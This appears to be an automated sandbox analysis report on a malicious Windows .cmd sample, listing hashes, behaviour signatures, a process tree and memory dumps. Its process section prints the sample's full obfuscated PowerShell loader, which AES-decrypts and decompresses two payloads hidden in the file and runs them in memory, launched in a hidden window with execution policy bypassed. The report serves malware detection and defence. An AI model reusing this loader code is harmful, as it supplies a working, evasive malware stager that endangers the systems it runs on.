Analysis
Max time kernel: 122s
Max time network: 123s
Platform: windows7_x64
Resource: win7-20240419-en
Resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
Submitted: 24-05-2024 13:33

Static task: static1
Behavioral task: behavioral1
Sample: e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd
Resource: win7-20240419-en (windows7-x64)
Result: 4 signatures, 150 seconds
General
Target: e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd
Size: 80KB
MD5: 9619f1ddef9f682e7e70d738513fbe95
SHA1: f60d6ccae771e30dd908ed35cd430321011d4e72
SHA256: e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a
SHA512: 371bb3fb57b2294c232e35e2b30c314ba879b3effb15cccca254df574fb3f97491d6ccc061e8569d21bfedda81055dcb993fa0c730f1021ac2ac4504e41b5c0a
SSDEEP: 1536:5kqlZx2cA8O4bhwdKd7KZWcs+whqo8LR8O4mCrnxVIddBxPUJPNuYQti:5kqhtthgKde7Q8o8l3CrCrEPNuxi
Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid / process):
    800  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege  800  powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes (description / pid / process / target process):
    PID 3008 wrote to memory of 2004  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 2004  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 2004  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 1808  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 1808  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 1808  3008  cmd.exe  cmd.exe
    PID 3008 wrote to memory of 800   3008  cmd.exe  powershell.exe
    PID 3008 wrote to memory of 800   3008  cmd.exe  powershell.exe
    PID 3008 wrote to memory of 800   3008  cmd.exe  powershell.exe
Processes
[1] C:\Windows\system32\cmd.exe (PID: 3008)
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd"
    Signatures:
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe (PID: 2004)
        Command line: cmd /c "set __=^&rem"

    [2] C:\Windows\system32\cmd.exe (PID: 1808)
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\Admin\AppData\Local\Temp\e069265534c2841bb1133c2ecf9d95cf73154737beaa3f8a763c7cf5037dc39a.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 800)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        Signatures:
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads (memory dumps / filesize)
memory/800-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp   4KB
memory/800-5-0x000000001B540000-0x000000001B822000-memory.dmp   2.9MB
memory/800-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp   9.6MB
memory/800-6-0x0000000002240000-0x0000000002248000-memory.dmp   32KB
memory/800-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp   9.6MB
memory/800-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp   9.6MB
memory/800-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp  9.6MB
memory/800-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp  9.6MB